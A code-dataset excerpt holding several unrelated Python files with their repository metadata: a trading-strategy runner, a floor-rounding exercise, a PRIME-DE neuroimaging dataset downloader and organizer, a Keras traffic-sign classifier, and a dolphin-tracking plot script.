                        monitor_stocks=self.monitor_stocks, source=source)
        # hand the shared-memory block's identity back to the parent process
        self.tmp_queue.put({
            'sec_mem_name': d.sec_mem.name,
            'sec_mem_shape': d.sec_mem_shape,
            'sec_mem_dtype': d.sec_mem_dtype,
        })
        d.start_event_loop()

    def _portfolio_process(self, sec_mem_name, sec_mem_shape, sec_mem_dtype):
        """
        Adapt the Portfolio object so that it can manage portfolio
        information for several strategies.
        """
        e = Portfolio(port_queue=self.port_queue, order_queue=self.order_queue, initial_caps=self.initial_cap,
                      monitor_stocks=self.monitor_stocks, sec_mem_name=sec_mem_name, sec_mem_shape=sec_mem_shape,
                      sec_mem_dtype=sec_mem_dtype)
        e.start_event_loop()

    def _execution_process(self, port_queue, order_queue, server, source):
        """
        Keep the eBest object separate so that orders always flow through
        order_queue.
        """
        ex = ExecutionHandler(port_queue, order_queue, server, source)
        ex.start_execution_loop()

    def _strategy_process(self, id, strategy_cls, strategy_name, strategy_universe, sec_mem_name, sec_mem_shape, sec_mem_dtype, source):
        # runs one strategy instance inside its own child process
        sp = strategy_cls(data_queue=self.data_queues[id], port_queue=self.port_queue, order_queue=self.order_queue,
                          strategy_name=strategy_name, strategy_universe=strategy_universe, monitor_stocks=self.monitor_stocks,
                          sec_mem_name=sec_mem_name, sec_mem_shape=sec_mem_shape, sec_mem_dtype=sec_mem_dtype, source=source)
        sp.calc_signals()

    # Strategy-related methods
    def _start_strategies(self, sec_mem_name, sec_mem_shape, sec_mem_dtype, source):
        """
        Run each strategy in its own separate process.
        """
        strategies = []
        id = 0
        for st, st_cls in self.strategies.items():
            strategies.append(Process(target=self._strategy_process, args=(id, st_cls, st, self.symbol_list[st],
                                      sec_mem_name, sec_mem_shape, sec_mem_dtype, source)))
            id += 1
        _ = [st.start() for st in strategies]

    # API setup
    def _init_virtual_setup(self, date_from, date_to):
        self.api = VirtualAPI(self.api_queue)
        self.api.stream_data(date_from, date_to, monitor_stocks=self.monitor_stocks)

    def _init_kiwoom_setup(self, monitor_stocks):
        # Qt event loop must run on the main thread
        app = QApplication(sys.argv)
        _ = KiwoomRealtimeAPI(self.api_queue, self.port_queue, self.order_queue, monitor_stocks)
        sys.exit(app.exec_())

    def _init_ebest_setup(self, monitor_stocks):
        ebest_data.Main(self.api_queue, self.port_queue, self.order_queue, monitor_stocks)

    def _init_crypto_setup(self):
        """
        The crypto setup should allow several exchanges (binance, upbit,
        bithumb, ...) to be used at the same time -- e.g. buying BTC on a
        domestic exchange and transferring it to Binance for trading --
        which is why it is kept separate.
        """
        pass
if __name__ == '__main__':
    r = Runner(username='ppark9553@gmail.com')
    # If a strategy does not exist yet, create/update it first, then add_strategy.
    r.update_strategy(
        strategy_name='strategy_1_first',
        using_strategy='strategy_1',
        capital=1000000,
        monitor_stocks=['005930', '000020', '000030']
    )
    r.update_strategy(
        strategy_name='strategy_1_second',
        using_strategy='strategy_1',
        capital=10000000,
        monitor_stocks=['005930', '000270']
    )
    r.add_strategy(['strategy_1_first', 'strategy_1_second'])
    # one-day virtual (backtest) session, with the execution process disabled
    r.start_trading(source='virtual', date_from='2021-02-03', exclude=['execution'])
    print('r')
| [
"ppark9553@gmail.com"
] | ppark9553@gmail.com |
b960c2fd6d1c30aa4ebce4aebd86b7586a91c0b3 | 03d733b0c6ed233ecfd47d984acce8b779bf345b | /Exercícios/Mundo 1/ex010.py | dd68b19f265ff4a91f76b8fa1b954710f332b28c | [
"MIT"
] | permissive | gslmota/Programs-PYTHON | ccbc7aa758dfeb7ce0a011654fee62a8dd0f563d | cf6f98ded31e1bc32997ad6887d96e60975c3cad | refs/heads/master | 2022-11-29T08:54:48.535215 | 2020-08-09T23:44:06 | 2020-08-09T23:44:06 | 274,794,244 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 187 | py | # Arrendondamento Número
import math
numero = float(input('Digite um número: '))
nbaixo = math.floor(numero)
print('O número {} tem como {} como parte inteira.'.format(numero, nbaixo)) | [
"gabrielsavio81@gmail.com"
] | gabrielsavio81@gmail.com |
992f7cf55c4bffc77e2110b339c9a3d091ef44f9 | d726a06a4fe344de854312cc2ae93558adefd206 | /pynet/datasets/primede.py | c26d45a1beb3a35e83cd5fbd315ba72c66df1ad0 | [
"LicenseRef-scancode-cecill-b-en"
] | permissive | CorentinAmbroise/pynet | 6f52f296b4ab5c651c341715786cb131391eabf1 | c353e5f80e75f785a460422ab7b39fa8f776991a | refs/heads/master | 2023-03-29T13:10:10.391193 | 2021-02-10T17:39:14 | 2021-02-10T17:39:14 | 278,072,885 | 0 | 0 | NOASSERTION | 2020-07-08T11:37:51 | 2020-07-08T11:37:51 | null | UTF-8 | Python | false | false | 14,409 | py | # -*- coding: utf-8 -*-
##########################################################################
# NSAp - Copyright (C) CEA, 2020
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
"""
Module that provides functions to prepare the PRIME-DE dataset.
"""
# Imports
import os
import re
import glob
import copy
import json
import logging
import subprocess
import lxml.html as lh
from pprint import pprint
from collections import namedtuple
from collections import OrderedDict
import requests
import nibabel
import numpy as np
import pandas as pd
from pynet.datasets import Fetchers
# Global parameters
QC = [
"016032099-001",
"025032241-001",
"016032098-001",
"016032098-002",
"016032103-001",
"016032103-002",
"016032097-001",
"016032104-001",
"016032104-002",
"016032100-001",
"016032100-002",
"016032101-001",
"016032102-001"
]
URL = "https://s3.amazonaws.com/fcp-indi/data/Projects/INDI/PRIME/{0}.tar.gz"
DESC_URL = "http://fcon_1000.projects.nitrc.org/indi/PRIME/files/{0}.csv"
HOME_URL = "http://fcon_1000.projects.nitrc.org/indi/indiPRIME.html"
SITES = [
"amu",
"caltech",
"ecnu-chen",
"ecnu",
"ion",
"iscmj",
"mcgill",
"lyon",
"mountsinai-P",
"mountsinai-S",
"nki",
"NIMH_encrypted",
"NIMH-CT_encrypted",
"nin",
"neurospin",
"newcastle",
"ohsu",
"princeton",
"rockefeller",
"sbri",
"ucdavis",
"uminn",
"oxford_encrypted",
"oxford-PM",
"NINPBBUtrecht",
"uwo",
"georgetown"
]
TRANSCODING = dict((name, "site-{0}".format(name)) for name in SITES)
TRANSCODING["NINPBBUtrecht"] = "site-utrecht"
TRANSCODING["georgetown"] = "Archakov2020"
TRANSCODING["oxford-encrypted"] = "site-oxford"
HTML_SITES = {
"amu": "Aix-Marseille Université",
"caltech": "California Institute of Technology",
"ecnu-chen": "East China Normal University - Chen",
"ecnu": "East China Normal University - Kwok",
"ion": "Institute of Neuroscience",
"iscmj": "Institut des Sciences Cognitives Marc Jeannerod",
"mcgill": "McGill University",
"lyon": "Lyon Neuroscience Research Center",
"mountsinai-P": "Mount Sinai School of Medicine",
"mountsinai-S": "Mount Sinai School of Medicine",
"nki": "Nathan Kline Institute",
"NIMH-encrypted": "National Institute of Mental Health",
"NIMH-CT-encrypted": "National Institute of Mental Health",
"nin": "Netherlands Institute for Neuroscience",
"neurospin": "NeuroSpin",
"newcastle": "Newcastle University",
"ohsu": "Oregon Health and Science University",
"princeton": "Princeton University",
"rockefeller": "Rockefeller University",
"sbri": "Stem Cell and Brain Research Institute",
"ucdavis": "University of California, Davis",
"uminn": "University of Minnesota",
"oxford-encrypted": "University of Oxford",
"oxford-PM": "University of Oxford (PM)",
"NINPBBUtrecht": "NIN Primate Brain Bank/Utrecht University",
"uwo": "University of Western Ontario",
"georgetown": "Georgetown University"
}
EXTRA_SITE = dict((name, "{0}".format(name)) for name in SITES)
EXTRA_SITE["ecnu"] = "ecnu-kwok"
EXTRA_SITE["NIMH-encrypted"] = "NIMH-L"
EXTRA_SITE["NIMH-CT-encrypted"] = "NIMH-M"
EXTRA_SITE["sbri"] = "sbri_pheno"
EXTRA_SITE["oxford-encrypted"] = "oxford"
DATADIR = "/neurospin/lbi/monkeyfmri/PRIME_DE_database"
Item = namedtuple("Item", ["input_path", "output_path", "metadata_path"])
logger = logging.getLogger("pynet")
def download_primede(datasetdir):
    """ Download the PRIME-DE dataset.

    Fetches each site's tarball and phenotypic csv with ``wget``, extracts
    the tarballs, and dumps the scraped site table to ``download/info.json``.
    Already-downloaded/extracted items are skipped, so the function is safe
    to re-run after an interruption.

    Reference: http://fcon_1000.projects.nitrc.org/indi/PRIMEdownloads.html

    Parameters
    ----------
    datasetdir: str
        the dataset destination folder.
    """
    logger.info("Download PRIME-DE dataset.")
    if not os.path.isdir(datasetdir):
        os.mkdir(datasetdir)
    downloaddir = os.path.join(datasetdir, "download")
    if not os.path.isdir(downloaddir):
        os.mkdir(downloaddir)
    # 1) site tarballs (mandatory: failures propagate)
    for site in SITES:
        localfile = os.path.join(downloaddir, "{0}.tar.gz".format(site))
        if os.path.isfile(localfile):
            logger.info(" - {0}".format(localfile))
            continue
        url = URL.format(site)
        logger.info(" - {0}".format(url))
        cmd = ["wget", "-P", downloaddir, url]
        logger.debug(" ".join(cmd))
        subprocess.check_call(cmd)
    # 2) phenotypic csv files (best effort: not every site publishes one)
    for site in SITES:
        site = site.replace("_encrypted", "-encrypted")
        localfile = os.path.join(downloaddir, "{0}.csv".format(
            EXTRA_SITE[site]))
        if os.path.isfile(localfile):
            logger.info(" - {0}".format(localfile))
            continue
        url = DESC_URL.format(EXTRA_SITE[site])
        logger.info(" - {0}".format(url))
        cmd = ["wget", "-P", downloaddir, url]
        logger.debug(" ".join(cmd))
        try:
            subprocess.check_call(cmd)
        except subprocess.CalledProcessError:
            # was a bare 'except: pass', which also swallowed
            # KeyboardInterrupt/SystemExit; keep the best-effort behavior
            # but only for failed downloads, and leave a trace in the log
            logger.warning("Could not download '%s', skipping.", url)
    # 3) extract the tarballs that have a known destination folder
    for site in SITES:
        site = site.replace("_encrypted", "-encrypted")
        tarballfile = os.path.join(downloaddir, "{0}.tar.gz".format(site))
        if site not in TRANSCODING:
            logger.info(" - {0}".format(site))
            continue
        localdir = os.path.join(downloaddir, "{0}".format(TRANSCODING[site]))
        if os.path.isdir(localdir):
            logger.info(" - {0}".format(localdir))
            continue
        cmd = ["tar", "-zxvf", tarballfile, "--directory", downloaddir]
        logger.debug(" ".join(cmd))
        subprocess.check_call(cmd)
    # 4) scrape and persist the sites description table
    infofile = os.path.join(downloaddir, "info.json")
    info = convert_html_table(HOME_URL)
    with open(infofile, "wt") as open_file:
        json.dump(info, open_file, indent=4)
def convert_html_table(url):
    """ Web scraping: HTML tables.

    Fetch *url* and turn its table rows into a dict mapping each header
    cell's text to the list of values in that column.
    """
    response = requests.get(url)
    tree = lh.fromstring(response.content)
    rows = tree.xpath("//tr")
    # every row must have as many cells as the header row
    assert all(len(rows[0]) == len(row) for row in rows)
    columns = [(cell.text_content(), []) for cell in rows[0]]
    for row in rows[1:]:
        for col_idx, cell in enumerate(row.iterchildren()):
            columns[col_idx][1].append(cell.text_content())
    return dict(columns)
def organize_primede(datasetdir):
    """ Organize the PRIME-DE dataset.
    Put all the data in the same BIDS organized folder.

    Reads the per-site tarball extractions under ``<datasetdir>/download``,
    renames each subject with a 3-digit site prefix, moves the subject
    folders into ``<datasetdir>/rawdata`` and writes a BIDS
    ``participants.tsv`` plus ``dataset_description.json``.

    Parameters
    ----------
    datasetdir: str
        the dataset destination folder.
    """
    logger.info("Download PRIME-DE dataset.")
    downloaddir = os.path.join(datasetdir, "download")
    rawdir = os.path.join(datasetdir, "rawdata")
    if not os.path.isdir(rawdir):
        os.mkdir(rawdir)
    # 'info.json' was produced by convert_html_table(): first column (empty
    # header "") holds the site names, the rest are per-site attributes.
    infofile = os.path.join(downloaddir, "info.json")
    with open(infofile, "rt") as open_file:
        info = json.load(open_file)
    col_names = info.pop("")
    # Re-shape into {site_name: {attribute: value}}.
    info = dict((key, dict((_key, _val) for _key, _val in zip(col_names, val)))
                for key, val in info.items())
    # Accumulators for the participants.tsv columns, in output order.
    metadata = OrderedDict(
        (key, []) for key in ("participant_id", "site", "site_index",
                              "species", "scanner", "state", "age", "weight",
                              "housing", "sex", "implant", "usage_agreement"))
    for site_idx, site in enumerate(SITES):
        # Optional per-site CSV with extra subject-level information.
        extrafile = os.path.join(downloaddir, "{0}.csv".format(
            EXTRA_SITE[site]))
        if os.path.isfile(extrafile):
            df = pd.read_csv(extrafile, dtype=str)
            if "SubID" in df.columns:
                df["Subject ID"] = df["SubID"]
        else:
            # No extra info: empty frame with the mandatory column only.
            df = pd.DataFrame.from_dict({"Subject ID": []})
        if "Subject ID" not in df.columns:
            raise ValueError("A 'Subject ID' column is mandatory in "
                             "'{0}'.".format(extrafile))
        # 1-based, zero-padded site index used as subject-id prefix.
        site_idx = str(site_idx + 1).zfill(3)
        site = site.replace("_encrypted", "-encrypted")
        if site not in TRANSCODING:
            logger.info(" - {0}".format(site))
            continue
        localdir = os.path.join(downloaddir, "{0}".format(TRANSCODING[site]))
        if not os.path.isdir(localdir):
            logger.info(" - {0}".format(site))
            continue
        for sid in os.listdir(localdir):
            if not sid.startswith("sub-"):
                logger.info(" - {0}".format(sid))
                continue
            # Keep only the numeric part of the subject identifier.
            _sid = sid.replace("sub-", "")
            _sid = re.sub("[^0-9]", "", _sid)
            sidinfo = {}
            # Match against the extra CSV, tolerating leading zeros.
            if _sid in df["Subject ID"].values:
                sidinfo = df[df["Subject ID"] == _sid]
            elif _sid.lstrip("0") in df["Subject ID"].values:
                sidinfo = df[df["Subject ID"] == _sid.lstrip("0")]
            if len(sidinfo) > 1:
                raise ValueError("Multiple match for '{0}' in '{1}'.".format(
                    _sid, extrafile))
            elif len(sidinfo) > 0:
                # Normalize column names: first word, lower case.
                sidinfo = sidinfo.to_dict(orient="list")
                sidinfo = dict((key.split(" ")[0].lower(), val[0])
                               for key, val in sidinfo.items())
                # Some sites use the French spelling 'sexe'.
                if "sexe" in sidinfo:
                    sidinfo["sex"] = sidinfo["sexe"]
            # Final BIDS subject id: site prefix + numeric id.
            _sid = "sub-{0}{1}".format(site_idx, _sid)
            siddir = os.path.join(localdir, sid)
            subject = _sid.replace("sub-", "")
            if subject in metadata["participant_id"]:
                raise ValueError("Subject '{0}' is not unique.".format(sid))
            metadata["participant_id"].append(subject)
            metadata["site"].append(site)
            metadata["site_index"].append(site_idx)
            metadata["species"].append(info[HTML_SITES[site]]["Species"])
            metadata["scanner"].append(info[HTML_SITES[site]]["Scanner"])
            metadata["state"].append(info[HTML_SITES[site]]["State"])
            # 'nc' (not communicated) when the extra CSV lacks the field.
            metadata["age"].append(sidinfo.get("age", "nc"))
            metadata["weight"].append(sidinfo.get("weight", "nc"))
            metadata["housing"].append(sidinfo.get("housing", "nc"))
            metadata["sex"].append(sidinfo.get("sex", "nc"))
            metadata["implant"].append(sidinfo.get("implant", "nc"))
            metadata["usage_agreement"].append(info[HTML_SITES[site]][
                "Usage Agreement"])
            # Move (not copy) the subject folder into the BIDS tree.
            cmd = ["mv", siddir, os.path.join(rawdir, _sid)]
            logger.info(" ".join(cmd))
            subprocess.check_call(cmd)
    participantsfile = os.path.join(rawdir, "participants.tsv")
    df = pd.DataFrame.from_dict(metadata)
    df.to_csv(participantsfile, sep="\t", index=False)
    desc = {
        "Name": "primede",
        "BIDSVersion": "1.0.2"
    }
    descfile = os.path.join(rawdir, "dataset_description.json")
    with open(descfile, "wt") as open_file:
        json.dump(desc, open_file, indent=4)
@Fetchers.register
def fetch_primede(datasetdir, maskdirname="brainmask"):
    """ Fetch/prepare the PRIME-DE dataset for pynet.

    Scans the BIDS tree for '*acq-nc1iso*' anatomical volumes, pairs each
    with its brain mask when available, and caches the stacked arrays as
    .npy/.nii.gz files plus a TSV description. Cached results are reused
    on subsequent calls.

    Parameters
    ----------
    datasetdir: str
        the dataset destination folder.
    maskdirname: str
        name of the folder that contains the brain masks.
    Returns
    -------
    item: namedtuple
        a named tuple containing 'input_path', 'output_path', and
        'metadata_path'.
    """
    logger.info("Loading PRIME-DE dataset.")
    # NOTE(review): os.path.split(os.sep) == (os.sep, ''), so this is
    # always the empty string and the .replace(imdirname, maskdirname)
    # below is a no-op; it looks like os.path.split(<image dir>)[-1]
    # was intended -- confirm against the preprocessing layout.
    imdirname = os.path.split(os.sep)[-1]
    if not os.path.isdir(datasetdir):
        os.mkdir(datasetdir)
    desc_path = os.path.join(datasetdir, "pynet_primede.tsv")
    input_path = os.path.join(datasetdir, "pynet_primede_inputs.npy")
    output_path = os.path.join(datasetdir, "pynet_primede_outputs.npy")
    # The TSV acts as a cache marker: only rebuild when it is missing.
    if not os.path.isfile(desc_path):
        metadata = OrderedDict(
            (key, []) for key in ("participant_id", "site", "with_mask",
                                  "valid", "session", "run"))
        anat_files = glob.glob(os.path.join(
            datasetdir, "sub-*", "ses-*", "anat", "*acq-nc1iso*.nii.gz"))
        if len(anat_files) == 0:
            raise ValueError("Your dataset directory must contain the Prime "
                             "DE data organized with the function provided in "
                             "this module and preprocessed.")
        inputs = []
        outputs = []
        for path in anat_files:
            # Subject / session ids come from the BIDS path components.
            sid = path.split(os.sep)[-4].replace("sub-", "")
            ses = path.split(os.sep)[-3].replace("ses-", "")
            inputs.append(nibabel.load(path).get_data())
            mask_path = path.replace(imdirname, maskdirname).replace(
                "acq-nc1iso", "acq-c1iso").replace(".nii.gz", "_mask.nii.gz")
            with_mask = 0
            if os.path.isfile(mask_path):
                outputs.append(nibabel.load(mask_path).get_data())
                with_mask = 1
            else:
                # No mask: placeholder volume, flagged with with_mask=0.
                # Assumes all images are (90, 90, 60) -- TODO confirm.
                outputs.append(np.zeros((90, 90, 60), dtype=int))
            basename = os.path.basename(path)
            # NOTE(review): non-raw regex string; '\d' should be r"run-(\d+)_".
            match = re.findall("run-(\d+)_", basename)
            if len(match) == 1:
                run = match[0]
            else:
                run = "nc"
            # Subjects listed in the QC blacklist are kept but marked invalid.
            valid = 1
            if "{0}-{1}".format(sid, ses) in QC:
                valid = 0
            metadata["participant_id"].append(sid)
            # By construction the first 3 digits encode the site index.
            metadata["site"].append(sid[:3])
            metadata["with_mask"].append(with_mask)
            metadata["valid"].append(valid)
            metadata["session"].append(ses)
            metadata["run"].append(run)
        inputs = np.asarray(inputs)
        outputs = np.asarray(outputs)
        # NIfTI copies: move the stacking axis last (x, y, z, subject).
        inputs_im = nibabel.Nifti1Image(
            inputs.transpose(1, 2, 3, 0), np.eye(4))
        outputs_im = nibabel.Nifti1Image(
            outputs.transpose(1, 2, 3, 0), np.eye(4))
        # .npy copies: add a channel axis (subject, 1, x, y, z).
        inputs = np.expand_dims(inputs, axis=1)
        outputs = np.expand_dims(outputs, axis=1)
        np.save(input_path, inputs)
        np.save(output_path, outputs)
        nibabel.save(inputs_im, input_path.replace(".npy", ".nii.gz"))
        nibabel.save(outputs_im, output_path.replace(".npy", ".nii.gz"))
        df = pd.DataFrame.from_dict(metadata)
        df.to_csv(desc_path, sep="\t", index=False)
    return Item(input_path=input_path, output_path=output_path,
                metadata_path=desc_path)
| [
"antoine.grigis@cea.fr"
] | antoine.grigis@cea.fr |
5783ce1e2789f35719b925425e95f886b574fd59 | 76d8f9d741d4e0bbd15a2c29fa77d041c01ea9bf | /exercise/keras/trafficsign.py | a422aaf4c134f2d7e34383236a64a9a9fb67fcf1 | [] | no_license | LevinJ/Behavioural-Cloning-P3 | d92bf3500797019a3fcf038a5c0e817f445e7a39 | fff8993ba2671c9664ab65899db952e2f5de37da | refs/heads/master | 2020-06-22T03:16:27.869561 | 2016-12-19T00:19:06 | 2016-12-19T00:19:06 | 74,758,835 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,848 | py | from utility.dumpload import DumpLoad
import numpy as np
from sklearn.preprocessing import scale
import pandas as pd
import os
from sklearn.preprocessing import MinMaxScaler
from keras.models import Sequential
from keras.layers import Dense, Activation
from sklearn.preprocessing import OneHotEncoder
from keras.optimizers import Adam
from sklearn.cross_validation import train_test_split
from keras.layers import Dropout, Flatten
from keras.layers import Convolution2D, MaxPooling2D
from keras.utils import np_utils
from keras import backend as K
class TrafficeSign(object):
    """Traffic-sign classification experiments on pickled 32x32x3 images.

    Loads './train.p' / './test.p', normalizes pixels to [-0.5, 0.5] and
    trains one of three Keras models (dense, dense with a validation
    split, or a small CNN) over the 43 sign classes.
    """

    def __init__(self):
        return

    def __get_data(self, filepath):
        # Load a pickled dict with 'features' (N,32,32,3) and 'labels' (N,);
        # labels are reshaped to a column vector for the one-hot encoder.
        dump_load = DumpLoad(filepath)
        data = dump_load.load()
        features = data['features']
        labels = data['labels'][:, np.newaxis]
        return features, labels

    def load_data(self):
        """Populate X/y train and test sets and sanity-check their shapes."""
        self.X_train, self.y_train = self.__get_data('./train.p')
        self.X_test, self.y_test = self.__get_data('./test.p')
        assert(self.X_train.shape[0] == self.y_train.shape[0]), "The number of images is not equal to the number of labels."
        assert(self.X_train.shape[1:] == (32,32,3)), "The dimensions of the images are not 32 x 32 x 3."
        return

    def normalize_data(self):
        """Linearly rescale pixels to [-0.5, 0.5] using the TRAIN min/max.

        The test set is scaled with the training statistics on purpose, so
        its values may fall slightly outside the target range.
        """
        max = 0.5
        min = -0.5
        train_min = self.X_train.min()
        train_max = self.X_train.max()
        self.X_train = self.X_train.astype('float32')
        self.X_test = self.X_test.astype('float32')
        #normalize training/val data
        self.X_train = (self.X_train - train_min) / (train_max - train_min) * (max - min) + min
        #normalize test data
        self.X_test = ((self.X_test - train_min) / (train_max - train_min)) * (max - min) + min
        # scaler = MinMaxScaler(feature_range=(-0.5, 0.5))
        # self.X_train = scaler.fit_transform(self.X_train.ravel())
        assert(round(np.mean(self.X_train)) == 0), "The mean of the input data is: %f" % np.mean(self.X_train)
        assert(np.min(self.X_train) == -0.5 and np.max(self.X_train) == 0.5), "The range of the input data is: %.1f to %.1f" % (np.min(self.X_train), np.max(self.X_train))
        return

    def two_layer_net(self):
        """Train a flat 128-unit dense network on the full training set."""
        model = Sequential()
        model.add(Dense(128, input_dim=32*32*3, name="hidden1"))
        model.add(Activation("relu"))
        model.add(Dense(output_dim=43, name="output"))
        model.add(Activation("softmax"))
        # STOP: Do not change the tests below. Your implementation should pass these tests.
        assert(model.get_layer(name="hidden1").input_shape == (None, 32*32*3)), "The input shape is: %s" % model.get_layer(name="hidden1").input_shape
        assert(model.get_layer(name="output").output_shape  == (None, 43)), "The output shape is: %s" % model.get_layer(name="output").output_shape
        model.compile(loss='categorical_crossentropy',
                      optimizer=Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
                      metrics=['accuracy'])
        # One-hot encode the integer class labels (43 classes).
        self.encoder = OneHotEncoder(sparse=False).fit(self.y_train)
        y_train_encoded = self.encoder.transform(self.y_train)
        # Images are flattened to 3072-vectors for the dense input layer.
        history = model.fit(self.X_train.reshape(-1,32*32*3), y_train_encoded, nb_epoch=2, batch_size=32, verbose=2)
        # STOP: Do not change the tests below. Your implementation should pass these tests.
        print("The training accuracy was: {}".format( history.history['acc']))
        assert(history.history['acc'][0] > 0.5), "The training accuracy was: {}".format( history.history['acc'])
        return

    def two_layer_net_split(self):
        """Same dense network, but with a 75/25 train/validation split."""
        model = Sequential()
        model.add(Dense(128, input_dim=32*32*3, name="hidden1"))
        model.add(Activation("relu"))
        model.add(Dense(output_dim=43, name="output"))
        model.add(Activation("softmax"))
        # STOP: Do not change the tests below. Your implementation should pass these tests.
        assert(model.get_layer(name="hidden1").input_shape == (None, 32*32*3)), "The input shape is: %s" % model.get_layer(name="hidden1").input_shape
        assert(model.get_layer(name="output").output_shape  == (None, 43)), "The output shape is: %s" % model.get_layer(name="output").output_shape
        model.compile(loss='categorical_crossentropy',
                      optimizer=Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
                      metrics=['accuracy'])
        self.X_train, self.X_val, self.y_train, self.y_val = train_test_split(self.X_train, self.y_train, test_size=0.25, random_state=42)
        # n_values=43 guards against classes missing from the split.
        self.encoder = OneHotEncoder(sparse=False,n_values = 43).fit(self.y_train)
        y_train_encoded = self.encoder.transform(self.y_train)
        y_val_encoded = self.encoder.transform(self.y_val)
        history = model.fit(self.X_train.reshape(-1,32*32*3), y_train_encoded, nb_epoch=2, batch_size=32, verbose=2,
                            validation_data=(self.X_val.reshape(-1,32*32*3), y_val_encoded))
        # STOP: Do not change the tests below. Your implementation should pass these tests.
        assert(round(self.X_train.shape[0] / float(self.X_val.shape[0])) == 3), "The training set is %.3f times larger than the validation set." % self.X_train.shape[0] / float(self.X_val.shape[0])
        assert(history.history['val_acc'][0] > 0.6), "The validation accuracy is: %.3f" % history.history['val_acc'][0]
        return

    def cnn_net(self):
        """Train a small conv->pool->dense CNN and print train/val/test accuracy."""
        model = Sequential()
        #layer 1
        model.add(Convolution2D(32, 3, 3,
                                border_mode='valid',
                                input_shape=(32,32,3), name="conv1"))
        model.add(Activation('relu'))
        model.add(MaxPooling2D())
        model.add(Dropout(0.5))
        #layer 2
        model.add(Flatten())
        model.add(Dense(128, name="hidden1"))
        model.add(Activation("relu"))
        #layer 3
        model.add(Dense(output_dim=43, name="output"))
        model.add(Activation("softmax"))
        model.compile(loss='categorical_crossentropy',
                      optimizer=Adam(lr=1e-3, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0),
                      metrics=['accuracy'])
        self.X_train, self.X_val, self.y_train, self.y_val = train_test_split(self.X_train, self.y_train, test_size=0.25, random_state=42)
        self.encoder = OneHotEncoder(sparse=False,n_values = 43).fit(self.y_train)
        y_train_encoded = self.encoder.transform(self.y_train)
        y_val_encoded = self.encoder.transform(self.y_val)
        y_test_encoded = self.encoder.transform(self.y_test)
        history = model.fit(self.X_train, y_train_encoded, nb_epoch=30, batch_size=32, verbose=2,
                            validation_data=(self.X_val, y_val_encoded))
        # STOP: Do not change the tests below. Your implementation should pass these tests.
        #assert(history.history['val_acc'][0] > 0.9), "The validation accuracy is: %.3f" % history.history['val_acc'][0]
        _, train_acc = model.evaluate(self.X_train, y_train_encoded, verbose=0)
        _, val_acc = model.evaluate(self.X_val, y_val_encoded, verbose=0)
        _, test_acc = model.evaluate(self.X_test, y_test_encoded, verbose=0)
        print('train{:.3f}, val{:.3f}: test{:.3f}'.format(train_acc, val_acc, test_acc))
        return

    def run(self):
        """Full pipeline: load, normalize, then train the CNN variant."""
        self.load_data()
        self.normalize_data()
        # self.two_layer_net()
        # self.two_layer_net_split()
        self.cnn_net()
        return
if __name__ == "__main__":
    # Script entry point: build the experiment helper and run the pipeline.
    TrafficeSign().run()
"jianzhirong@gmail.com"
] | jianzhirong@gmail.com |
92ea114b1907807cc47d45d2b77ee51981cafab8 | 887f2e664c6d92f17e784f57022333a2fb859d06 | /analysis/plotMove.py | 252a91a4c6be6dc9ba8b647cac05970a426f3080 | [] | no_license | ctorney/dolphinUnion | 1968e258c6045060b2c921bd723d0ef0daea0147 | 9d7212d172a8a48a36fc4870fcdb04d66130bb76 | refs/heads/master | 2021-01-19T04:40:57.286526 | 2017-08-17T20:44:58 | 2017-08-17T20:44:58 | 46,424,670 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,332 | py | import numpy as np
import pandas as pd
import os, re
import math
import time
from scipy import interpolate
from scipy import ndimage
import matplotlib.pyplot as plt
import matplotlib.pyplot as plt
import matplotlib.animation as ani
HD = os.getenv('HOME')
FILELIST = HD + '/workspace/dolphinUnion/tracking/solo/fileList.csv'
DATADIR = HD + '/Dropbox/dolphin_union/2015_footage/Solo/processedTracks/'
df = pd.read_csv(FILELIST)
for index, row in df.iterrows():
noext, ext = os.path.splitext(row.filename)
posfilename = DATADIR + '/TRACKS_' + str(index) + '_' + noext + '.csv'
gridfilename = DATADIR + '/GRID_' + str(index) + '_' + noext + '.npy'
gridPosfilename = DATADIR + '/GRIDPOS_' + str(index) + '_' + noext + '.npy'
posDF = pd.read_csv(posfilename)
posDF = posDF[posDF['frame']%60==0]
# posDF['x']=posDF['x']-min(posDF['x'])
# posDF['y']=posDF['y']-min(posDF['y'])
# xrange = max(posDF['x'])
# yrange = max(posDF['y'])
# nx = math.ceil(xrange/32)
# ny = math.ceil(yrange/32)
# grid = np.zeros((nx,ny,2))
# gridPos = np.zeros((nx,ny,2))
# xh = np.cos(posDF['heading'].values)
# yh = np.sin(posDF['heading'].values)
# xdirs = posDF['dx'].values
# ydirs = posDF['dy'].values
# xp = posDF['x'].values
# yp = posDF['y'].values
# kappa = 32.0*32.0
# for i in range(nx):
# for j in range(ny):
# gx = i * 32
# gy = j * 32
# dists = (((posDF['x'].values - gx)**2 + (posDF['y'].values - gy)**2))
# weights = np.exp(-dists/kappa)
# gridPos[i,j,0]=gx
# gridPos[i,j,1]=gy
# xav = np.sum(weights*xdirs)/np.sum(weights)
# yav = np.sum(weights*ydirs)/np.sum(weights)
# grid[i,j,0]=xav/math.sqrt(xav**2+yav**2)
# grid[i,j,1]=yav/math.sqrt(xav**2+yav**2)
grid = np.load(gridfilename)
gridPos = np.load(gridPosfilename)
#plt.quiver(xp,yp,xh,yh,angles='xy', scale_units='xy', color='r', scale=1.0/32.0)
#plt.quiver(gridPos[:,:,0],gridPos[:,:,1],grid[:,:,0],grid[:,:,1],angles='xy', scale_units='xy', scale=1.0/32.0)
winLen = 30
w = np.kaiser(winLen,1)
w = w/w.sum()
maxRange = 0
flen = len(posDF.groupby('frame'))
Xcentroids = np.zeros((flen))
Ycentroids = np.zeros((flen))
fc=0
for fnum, frame in posDF.groupby('frame'):
dist = max(frame['x'].values)-min(frame['x'].values)
if dist>maxRange:
maxRange=dist
dist = max(frame['y'].values)-min(frame['y'].values)
if dist>maxRange:
maxRange=dist
Xcentroids[fc] = np.average(frame['x'].values)
Ycentroids[fc] = np.average(frame['y'].values)
fc=fc+1
